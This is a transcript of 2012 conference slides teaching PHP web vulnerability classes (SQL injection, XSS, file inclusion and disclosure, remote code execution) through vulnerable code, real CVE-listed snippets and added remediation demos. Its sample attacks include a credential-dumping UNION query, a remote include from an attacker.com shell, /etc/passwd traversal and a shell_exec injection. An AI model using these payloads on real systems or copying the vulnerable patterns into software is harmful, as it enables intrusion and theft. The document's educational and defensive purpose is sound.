Spot the Web Vulnerability
These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.

Comment: Thanks ! Great material/studies/and work !

Presentation Transcript

  • Spot the Web Vulnerability
    Miroslav Štampar (dev@sqlmap.org)
  • Talk overview
    Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s))
    Usage of code review on real-life vulnerabilities as an educational tool
    Mitigation in the form of remedies
    Note: While the given examples discuss PHP code (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language
    October 13th, 2012 2
  • Vulnerability statistics (1)
  • Vulnerability statistics (2)
    Name | Visits | Platform | Date
    --- | --- | --- | ---
    vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability | 31961 | php | 2010-08-29
    WordPress <= 3.3.1 Multiple Vulnerabilities | 25960 | php | 2012-01-25
    WordPress 3.1.3 SQL Injection Vulnerabilities | 25168 | php | 2011-07-01
    Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day | 24166 | php | 2011-07-21
    vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability | 22850 | php | 2010-07-24
    vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability | 19074 | php | 2011-05-23
    Bypass the JQuery-Real-Person captcha plugin 0-day | 17089 | php | 2011-11-28
    FCKeditor all version Arbitrary File Upload Vulnerability | 16211 | php | 2011-08-09
    Joomla 1.5 URL Redirecting Vulnerability | 16061 | php | 2010-08-24
    WordPress TimThumb Plugin - Remote Code Execution | 15991 | php | 2011-08-03
  • SQL injection (1)
    Vulnerability in dynamic database queries that include unfiltered user-supplied input
    Usually the result of concatenating raw parameter values into the desired SQL statement
    Various techniques are used depending on the target's environment and the affected vulnerable query
    The goal is unauthorized access to the underlying database
    Involved in 60% of all breach incidents examined by 7Safe in 2010
  • SQL injection (2)
    Example of vulnerable code (vuln.php):
      <?php
      ...
      $sql = "SELECT * FROM forum_logs WHERE id = " . $_GET["id"];
      $result = mysql_query($sql);
      ...
      ?>
    Sample attack:
      http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user--
  • Cross-site scripting (1)
    Enables attackers to inject client-side script into web pages viewed by other users
    Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible
    Persistent (stored) and non-persistent (reflected) variants
    Samy (JS.Spacehero), the first known XSS worm, infected over 1 million MySpace profiles in less than 20 hours
  • Cross-site scripting (2)
    Example of vulnerable code (vuln.php):
      <?php
      $name = $_GET['name'];
      echo "Welcome $name<br>";
      echo "<a href=\"http://www.site.com/\">Click to Visit</a>";
      ?>
    Sample attack:
      http://www.target.com/vuln.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href ="http://www.attacker.com/";}</script>
  • File inclusion (1)
    Allows inclusion of arbitrary code into the vulnerable application for further execution
    Local file (LFI) and remote file (RFI) variants
    Attackers' fondest wish (especially RFI)
    Access anything that the original program context is able to (configuration files, password files, etc.)
    Involved in 21% of all web application attacks observed by Imperva in 2011
  • File inclusion (2)
    Example of vulnerable code (vuln.php):
      <?php
      $page = 'index';
      if (isset($_REQUEST['page'])) $page = $_REQUEST['page'];
      include($page . '.php');
      ?>
    Sample attack:
      http://www.target.com/vuln.php?page=http://www.attacker.com/shell.php?foo=
  • File disclosure (1)
    Access files that are not intended to be accessible and expose their content to the attackers
    Directory traversal variant in cases where the characters for traversing to the parent directory (e.g. ../) are passed through to the file API(s)
    Local file inclusion becomes a variant too if used for obtaining non-script content
    Easiest to exploit
  • File disclosure (2)
    Example of vulnerable code (vuln.php):
      <?php
      $template = 'default.php';
      if (isset($_COOKIE['template'])) $template = $_COOKIE['template'];
      readfile("templates/" . $template);
      ?>
    Sample attack:
      GET /vuln.php HTTP/1.0
      Cookie: template=../../../../../../../../../etc/passwd
  • Remote code execution (1)
    Provides a way to execute arbitrary code
    In one variant the provided code is executed inside the vulnerable web application (e.g. eval)
    In the other, more common variant, the content of one of the request parameters is written to a browser-reachable file, giving the attacker the opportunity to run it as a standalone script
    TimThumb WordPress PHP plugin vulnerability (CVE: 2011-4106) affected 1.2 million websites
  • Remote code execution (2)
    Example of vulnerable code (vuln.php):
      <?php
      $fp = fopen("prefs/timezone.php", "w");
      fwrite($fp, "<?php\r\n\$timezone=" . $_REQUEST['tz'] . ";\r\n?>");
      fclose($fp);
      ?>
    Sample attack:
      http://www.target.com/vuln.php?tz=us;shell_exec($_GET[cmd])
      http://www.target.com/prefs/timezone.php?cmd=cat /etc/passwd
  • Spot SQL injection (1)
    OpenConf <= 4.11 (EDB-ID: 18820, CVE: 2012-1002, OSVDB-ID: 78996)
      if (isset($_POST['authornum']) && ctype_digit($_POST['authornum'])) {
          $oc_authorNum = $_POST['authornum'];
      } else {
          $anr = ocsql_query("SELECT * FROM `" . OCC_TABLE_PAPER . "` WHERE `paperid`=" . safeSQLstr($_POST['pid'])) or err("Unable to retrieve submission information");
          if (mysql_num_rows($anr) != 1) {
              err(oc_('Submission ID or password entered is incorrect'));
          }
  • Spot SQL injection (2)
    MyTickets <= v2.0.8 (EDB-ID: 19264, OSVDB-ID: 83231)
      if(empty($cookies['language'])){
          setcookie('MyTickets_language', $setting['default_language'], time()+86400, "/");
          $language = $setting['default_language'];
      } else {
          if($db->count('languages', "`id`='" . $cookies['language'] . "'") == 0){
              $language = $setting['default_language'];
          }
          $language = $cookies['language'];
      }
      $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='" . $language . "'"));
  • Spot SQL injection (3)
    WP-Predict Plugin for WordPress <= v1.0 (EDB-ID: 19715, OSVDB-ID: 83697)
      foreach ($postPredicts as $postPredict){
          ...
          if ($_POST['postAction'] == "submitVote" && intval($_POST['predictId']) == $postPredict->predictId) {
              $submitPredictId = $_POST['predictId'];
              $selectedOption = $_POST['predictSelection'];
              ...
              $dbResult = @$wpdb->query("INSERT INTO " . $wpdb->prefix . "wpp_predict_votes (predictEntryId, predictUserId, predictSelectedOption) VALUES (" . $submitPredictId . ", " . $user_ID . ", " . $selectedOption . ")");
              ...
          }
  • Spot SQL injection (4)
    phpDenora <= v1.4.6 (EDB-ID: 18516, OSVDB-ID: 79497)
      $start['year'] = isset($_GET['sy']) ? htmlspecialchars($_GET['sy']) : date('Y');
      $start['month'] = isset($_GET['sm']) ? htmlspecialchars($_GET['sm']) : date('m');
      $start['day'] = isset($_GET['sd']) ? htmlspecialchars($_GET['sd']) : date('d');
      ...
      $sidq = sql_query("SELECT `id` FROM $table WHERE year = '" . $start['year'] . "' AND month = '" . $start['month'] . "' AND day = '" . $start['day'] . "'");
  • Spot SQL injection (5)
    AdRotate Plugin for WordPress <= v3.6.6 (EDB-ID: 18114, CVE: 2011-4671, OSVDB-ID: 77507)
      if(isset($_GET['track']) OR $_GET['track'] != '') {
          $meta = base64_decode($_GET['track']);
          ...
          list($ad, $group, $block) = explode("-", $meta);
          ...
          $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `" . $prefix . "adrotate` WHERE `id` = " . $ad . " LIMIT 1;"));
          ...
      }
  • Spot SQL injection (6)
    WP Bannerize Plugin for WordPress <= v2.8.7 (EDB-ID: 17906, OSVDB-ID: 76658)
      if (@isset($_SERVER['HTTP_X_REQUESTED_WITH'])) {
          ...
          $limit = intval($_POST['limit']);
          $page_offset = (intval($_POST['offset']) - 1) * $limit;
          foreach($_POST["item"] as $key => $value){
              $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix . "bannerize_b", (intval($key)+$page_offset), $value);
              $result = mysql_query($sql);
          }
      }
  • Spot cross-site scripting (1)
    PHPDug <= v2.0.0 (EDB-ID: 11017, OSVDB-ID: 61594)
      $page = new HtmlTemplate("templates/" . $config['tpl_name'] . "/index.html");
      ...
      $page->SetParameter('UPCOMING_LINK', $config['site_url'] . 'upcoming.php?id=' . $_GET['id']);
      $page->SetParameter('POPULAR_LINK', $config['site_url'] . 'index.php');
      ...
      $page->CreatePageEcho($lang, $config);
  • Spot cross-site scripting (2)
    WordPress <= v2.8.1 (EDB-ID: 9250, CVE: 2009-2851, OSVDB-ID: 56193)
      function _wp_comment_row($comment_id, $mode, $comment_status, $checkbox = true, $from_ajax = false) {
          $comment = get_comment($comment_id);
          ...
          $author_url = get_comment_author_url();
          ...
          $author_url_display = $author_url;
          ...
          echo "<a title='$author_url' href='$author_url'>$author_url_display</a><br/>";
          ...
      }
      ...
      foreach ($comments as $comment)
          _wp_comment_row($comment->comment_ID, $mode, $comment_status);
  • Spot cross-site scripting (3)
    damianov.net Shoutbox <= v1.0 (EDB-ID: 12593)
      $handle = fopen($shoutsFile, "a");
      $toWrite = "\n" . stripslashes($_POST["txtNick"]) . "|" . $_POST["txtEmail"] . "|" . stripslashes($_POST["txtShout"]);
      fwrite($handle, $toWrite);
      fclose($handle);
      ...
      $lines = array_reverse(file($shoutsFile));
      foreach ($lines as $line_num => $line) {
          $info = explode("|", $line, 3);
          if ((is_email($info[1])) && $displayEmails)
              $info[0] = "<a href='mailto:" . $info[1] . "'>" . $info[0] . "</a>";
          echo "<div style='$fontStyle'><b>$info[0]</b> : " . ($allowHTML ? $info[2] : strip_tags($info[2])) . "</div>\n"; // CVE-2004-0595 (strip_tags() bypass)
      }
  • Spot file inclusion (1)
    Zen Cart <= v1.3.9f (EDB-ID: 15166, OSVDB-ID: 68300)
      $typefilter = 'default';
      if (isset($_GET['typefilter'])) $typefilter = $_GET['typefilter'];
      require(DIR_WS_INCLUDES . zen_get_index_filters_directory($typefilter . '_filter.php'));
  • Spot file inclusion (2)
    phpMyBackupPro <= v2.2 (EDB-ID: 19550, OSVDB-ID: 83700)
      if (isset($_POST['lang']) && preg_replace("#.*/#", "", $_SERVER['PHP_SELF']) == "config.php") $CONF['lang'] = $_POST['lang'];
      if (!isset($CONF['lang'])) $CONF['lang'] = "english";
      if (!file_exists($prepath . PMBP_LANGUAGE_DIR . $CONF['lang'] . ".inc.php")) include_once($prepath . PMBP_LANGUAGE_DIR . "english.inc.php");
      else include($prepath . PMBP_LANGUAGE_DIR . $CONF['lang'] . ".inc.php");
  • Spot file inclusion (3)
    Relocate Upload Plugin for WordPress <= v0.14 (EDB-ID: 17869, CVE: 2012-1205, OSVDB-ID: 79250)
      if (isset($_GET['ru_folder'])) {
          define('WP_USE_THEMES', false);
          require_once(urldecode($_GET['abspath']) . '/wp-load.php');
          ...
      }
  • Spot file disclosure (1)
    ISPworker <= v1.23 (EDB-ID: 10262)
      header('Content-type: ' . $_REQUEST['type']);
      header('Content-Disposition: attachment; filename="' . $_REQUEST['filename'] . '"');
      readfile("./tmp/$ticketid" . "_" . $_REQUEST['filename']);
  • Spot file disclosure (2)
    PICA Photo Gallery Plugin for WordPress <= v1.0 (EDB-ID: 19016, OSVDB-ID: 82702)
      $timg = $imgname = $_REQUEST['imgname'];
      $pluginName = 'pica-photo-gallery';
      $file = dirname(dirname(dirname(__FILE__))) . "/uploads/" . $pluginName . "/" . $timg;
      header('Content-Description: File Transfer');
      header('Content-Type: application/octet-stream');
      ...
      header('Content-Length: ' . filesize($file));
      ob_clean();
      flush();
      readfile($file);
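    Added example (not code from the slides or from any of the projects named above): the two remedies the file inclusion and file disclosure slides call for, in one runnable script. resolvePage() replaces "build the include path from input" with an allowlist lookup, and containedPath() canonicalises a readfile() target with realpath() and refuses anything whose canonical path leaves the intended base directory. The function names, the temporary directory and the template files are all constructed for the demo.

```php
<?php
// Added example, not code from the slides: containing user-controlled file
// names. resolvePage() addresses the file inclusion slides (allowlist instead
// of building an include path from input) and containedPath() addresses the
// file disclosure slides (canonical path must stay below the intended base
// directory). All directory and file names below are constructed for the demo.
declare(strict_types=1);

// File inclusion remedy: the request value is a lookup key into a fixed map,
// never a path fragment, so "page=http://.../shell.php" or "page=../x" can
// only miss and fall back to the default page.
function resolvePage(string $requested, array $allowed, string $default = 'index'): string
{
    return $allowed[$requested] ?? $allowed[$default];
}

// File disclosure remedy: canonicalise with realpath(), then require the
// result to start with the base directory plus a separator. realpath()
// collapses "../" and symlinks, so the check runs on what the OS would open.
function containedPath(string $baseDir, string $userFile): ?string
{
    // A NUL byte truncates the name in C-level file APIs; reject it early.
    if (strpos($userFile, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userFile);
    if ($candidate === false) {
        return null; // target does not exist
    }
    // Separator appended so "/srv/templates_private" is not accepted as
    // being inside "/srv/templates".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // exists, but outside the base directory (traversal)
    }
    return $candidate;
}

// Demo: build a throw-away templates directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'spot_demo_' . getmypid();
mkdir($root . '/templates/sub', 0700, true);
file_put_contents($root . '/templates/default.php', "default template\n");
file_put_contents($root . '/templates/sub/extra.txt', "sub template\n");

$pages = ['index' => $root . '/templates/default.php'];
var_dump(resolvePage('index', $pages) === $pages['index']);                                  // known key
var_dump(resolvePage('http://www.attacker.com/shell.php?foo=', $pages) === $pages['index']); // unknown key falls back

foreach (['default.php', 'sub/extra.txt', '../../../../../../../../../etc/passwd', 'missing.php'] as $name) {
    $resolved = containedPath($root . '/templates', $name);
    printf("%-45s => %s\n", $name, $resolved === null ? 'rejected' : 'served ' . basename($resolved));
}

// Clean up the demo directory.
unlink($root . '/templates/sub/extra.txt');
unlink($root . '/templates/default.php');
rmdir($root . '/templates/sub');
rmdir($root . '/templates');
rmdir($root);
```

    Run it with `php` on the command line. The allowlist is the stronger of the two controls because the input never becomes part of a path at all; the realpath() check is what you reach for when sub-directories under the base must remain reachable, and it must be done on the canonical path, not on the raw string, or encoded and symlinked variants of "../" slip past.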
  • Spot remote code execution (1)
    WebCalendar <= v1.2.4 (EDB-ID: 18775, CVE: 2012-1495, OSVDB-ID: 81329)
      $file = '../includes/settings.php';
      ...
      $settings['single_user_login'] = getPostValue('form_single_user_login');
      ...
      $fd = @fopen($file, 'w+b', false);
      ...
      fwrite($fd, "<?php\r\n");
      fwrite($fd, '/* updated via install/index.php on ' . date('r') . "\r\n");
      foreach ($settings as $k => $v) {
          if ($v != '<br />' && $v != '')
              fwrite($fd, $k . ': ' . $v . "\r\n");
      }
  • Spot remote code execution (2)
    Ajax File and Image Manager <= v1.0 (EDB-ID: 18075, CVE: 2011-4825, OSVDB-ID: 76928)
      @ob_start();
      displayArray($_POST);
      writeInfo(@ob_get_clean());
      ...
      function writeInfo($data, $die = false) {
          $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+');
          @fwrite($fp, $data);
          @fwrite($fp, "\n\n" . date('d/M/Y H:i:s'));
          @fclose($fp);
          ...
      }
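    Added example (not code from the slides or from the projects above): the slide-14 timezone writer next to two ways of storing the same setting that cannot turn request data into code. The vulnerable function is kept for comparison only and is never called; the safe variants validate the value against PHP's own timezone list, emit it with var_export() (a quoted literal, so it can only ever be the value of $timezone), or drop code generation entirely and store JSON. File names and the temporary directory are constructed for the demo.

```php
<?php
// Added example, not code from the slides: the slide-14 timezone writer beside
// two safer ways of persisting the same setting. Paths are constructed (a
// temporary directory); nothing here touches a real web root.
declare(strict_types=1);

// Vulnerable shape from slide 14: the raw request value is spliced into PHP
// source, so a value like "us;shell_exec($_GET[cmd])" is written as code and
// runs the next time the file is requested. Shown for comparison, never called.
function writePrefsVulnerable(string $file, string $tz): void
{
    $fp = fopen($file, 'w');
    fwrite($fp, "<?php\r\n\$timezone=" . $tz . ";\r\n?>");
    fclose($fp);
}

// Safer: validate against the known identifiers first (Remedies (1)), then
// emit the value with var_export(), which produces a quoted string literal
// with embedded quotes and backslashes escaped. Whatever was sent can only
// ever be the *value* of $timezone.
function writePrefsSafe(string $file, string $tz): void
{
    if (!in_array($tz, DateTimeZone::listIdentifiers(), true)) {
        throw new InvalidArgumentException('unknown timezone identifier');
    }
    $src = "<?php\n\$timezone = " . var_export($tz, true) . ";\n";
    file_put_contents($file, $src, LOCK_EX);
}

// Safest: do not generate code at all. Keep settings as data (JSON) in a
// directory the web server does not serve; PHP never executes it and a
// browser cannot fetch it, so the second URL on slide 14 has nothing to hit.
function writePrefsJson(string $file, string $tz): void
{
    file_put_contents($file, json_encode(['timezone' => $tz], JSON_THROW_ON_ERROR), LOCK_EX);
}

function readPrefsJson(string $file): string
{
    $prefs = json_decode(file_get_contents($file), true, 512, JSON_THROW_ON_ERROR);
    return (string) $prefs['timezone'];
}

// Demo with constructed inputs: a legitimate identifier and the slide's payload.
$dir      = sys_get_temp_dir();
$phpFile  = $dir . DIRECTORY_SEPARATOR . 'timezone_demo.php';
$jsonFile = $dir . DIRECTORY_SEPARATOR . 'timezone_demo.json';

writePrefsSafe($phpFile, 'Europe/Budapest');
include $phpFile;                 // defines $timezone from the generated literal
echo "stored via var_export: $timezone\n";

try {
    writePrefsSafe($phpFile, 'us;shell_exec($_GET[cmd])');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}

writePrefsJson($jsonFile, 'Europe/Budapest');
echo "stored as JSON: " . readPrefsJson($jsonFile) . "\n";

unlink($phpFile);
unlink($jsonFile);
```

    The ordering matters: validation rejects bad input before anything is written, var_export() is the belt-and-braces layer for the case where a PHP settings file really is required, and the JSON variant removes the whole class of bug, since a data file outside the document root is neither executable nor reachable from a browser.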
  • Remedies (1)
    Data validation
    Process of ensuring that the application is running with correct data
    Discard the data if it doesn't pass the validation process
      if (!preg_match('/^\(?\d{3}\)?[-\s.]?\d{3}[-\s.]\d{4}$/', $phone)) {
          echo "Your phone number is invalid";
          die();
      }
  • Remedies (2)
    Data sanitization
    Removing any unwanted bits from the data and normalizing it to the correct form
      $comment = strip_tags($_POST['comment']);
      ...
      $id = intval($_GET['id']);
      ...
      $username = preg_replace('/[^a-zA-Z0-9._]/', '', $_REQUEST['username']);
      ...
      $query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'", mysql_real_escape_string($user), mysql_real_escape_string($password));
  • Remedies (3)
    Output escaping
    Protecting the integrity of displayed data
    Prevents the browser from applying any unintended meaning to any special sequence of characters that may be found
    Always escape output provided by users!
      echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES);
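    Added example (not code from the slides): output escaping done per context, covering the three situations the cross-site scripting slides show. e() is the htmlspecialchars(ENT_QUOTES) call from Remedies (3) for HTML text and attribute values (slide 8); upcomingLink() handles a value placed inside a URL query string (the PHPDug "upcoming.php?id=" case); safeHref() handles a whole user-supplied URL used as an href (the WordPress comment-author case), where escaping alone is not enough because it never changes the URL scheme. Function names and sample inputs are constructed for the demo.

```php
<?php
// Added example, not code from the slides: context-aware output escaping for
// the three situations in the XSS slides. All sample inputs are constructed.
declare(strict_types=1);

// HTML text/attribute context. ENT_QUOTES encodes both ' and " so the value
// is safe inside single- or double-quoted attributes; the charset is explicit.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// URL query-string context: percent-encode the value first, then HTML-escape
// the finished URL because it sits inside an href attribute (two layers,
// applied inside-out).
function upcomingLink(string $siteUrl, string $id): string
{
    $url = $siteUrl . 'upcoming.php?id=' . rawurlencode($id);
    return '<a href="' . e($url) . '">upcoming</a>';
}

// Whole-URL context: HTML escaping leaves "javascript:" untouched, because
// escaping changes characters, not the URL scheme. Allow http(s) only.
function safeHref(string $url): ?string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return null;
    }
    return e($url);
}

// Slide 8, fixed: the name is escaped before it is echoed into the page.
function welcome(string $name): string
{
    return 'Welcome ' . e($name) . '<br>';
}

// WordPress <= 2.8.1 case, fixed: attribute values are quoted and escaped,
// and a URL with a disallowed scheme is rendered as plain text, not a link.
function authorLink(string $url): string
{
    $href = safeHref($url);
    if ($href === null) {
        return '<span>' . e($url) . '</span>';
    }
    return '<a title="' . $href . '" href="' . $href . '">' . $href . '</a>';
}

// Demo.
echo welcome('<script>alert(1)</script>'), PHP_EOL;
echo upcomingLink('http://www.site.com/', '1"><script>alert(1)</script>'), PHP_EOL;
echo authorLink('https://example.org/~miroslav'), PHP_EOL;
echo authorLink('javascript:alert(1)'), PHP_EOL;
echo authorLink('http://example.org/" onmouseover="alert(1)'), PHP_EOL;
```

    The point the three functions make together is that "escape output" means choosing the encoder for the place the data lands: HTML body, attribute value, URL component and URL scheme each need their own treatment, and the PHPDug and WordPress snippets on the earlier slides fail because they apply none, not because they apply the wrong one.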
  • Remedies (4)
    Safe communication with a database
    Prepared statements use one channel for commands and another one for data (which never allows commands)
      $db = new PDO('dblib:host=localhost;dbname=testdb;charset=UTF-8', $user, $pass);
      $query = 'SELECT * FROM users WHERE id = :id';
      $stmt = $db->prepare($query);
      $stmt->bindValue(':id', $_REQUEST['id']);
      $stmt->execute();
      while($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
          ...
  • Questions?
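    Added example (not code from the slides): the slide-6 concatenation and the Remedies (4) prepared statement side by side, run against an in-memory SQLite database through PDO so it works offline (it assumes the pdo_sqlite extension is loaded). It also runs the two "looks safe" patterns from the "Spot SQL injection" slides against the same tampered value: htmlspecialchars() (phpDenora) and intval() used only in the comparison (WP-Predict). The table, its rows, the function names and the tampered input are constructed for the demo.

```php
<?php
// Added example, not code from the slides: vulnerable concatenation beside a
// prepared statement, against an in-memory SQLite database (assumes pdo_sqlite).
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real prepare, not client-side quoting
]);
$db->exec('CREATE TABLE forum_logs (id INTEGER PRIMARY KEY, entry TEXT)');
$db->exec("INSERT INTO forum_logs VALUES (1, 'first'), (2, 'second'), (3, 'third')");

// Vulnerable (slide 6): the parameter becomes part of the SQL text.
function logsVulnerable(PDO $db, string $id): array
{
    $sql = 'SELECT * FROM forum_logs WHERE id = ' . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed (Remedies (4)): the SQL text is fixed at prepare() time; the value is
// bound as an integer afterwards and can only be compared, never parsed.
function logsPrepared(PDO $db, int $id): array
{
    $stmt = $db->prepare('SELECT * FROM forum_logs WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Validation gate (Remedies (1)): ctype_digit() decides whether the query
// runs at all. In the OpenConf snippet the failing branch still reaches the
// database with raw input; here it does not.
function logsValidated(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('id must be an unsigned integer');
    }
    return logsPrepared($db, (int) $id);
}

$tampered = '1 OR 1=1';

// 1. Raw concatenation: the OR clause is executed and every row comes back.
printf("raw:                %d row(s)\n", count(logsVulnerable($db, $tampered)));

// 2. htmlspecialchars() (phpDenora pattern) rewrites only < > & " ' and none
//    of them occur in the tampered value, so the query is identical to case 1.
printf("htmlspecialchars(): %d row(s)\n", count(logsVulnerable($db, htmlspecialchars($tampered))));

// 3. intval() used for the comparison but the raw value used in the query
//    (WP-Predict pattern): intval('1 OR 1=1') is 1, the check passes, and the
//    query still receives the raw string.
if (intval($tampered) == 1) {
    printf("intval() check:     %d row(s)\n", count(logsVulnerable($db, $tampered)));
}

// 4. Prepared statement with an integer bind: only id = 1 can match.
printf("prepared:           %d row(s)\n", count(logsPrepared($db, (int) $tampered)));

// 5. Validation first: the tampered value never reaches the database.
try {
    logsValidated($db, $tampered);
} catch (InvalidArgumentException $e) {
    printf("validated:          rejected (%s)\n", $e->getMessage());
}
```

    Cases 2 and 3 are the ones worth internalising from the "Spot" slides: an HTML encoder is not a SQL defence, and a check on one copy of the value says nothing about the copy that actually reaches the query. The bound parameter in case 4 fixes both, because the value is no longer text the database parser sees.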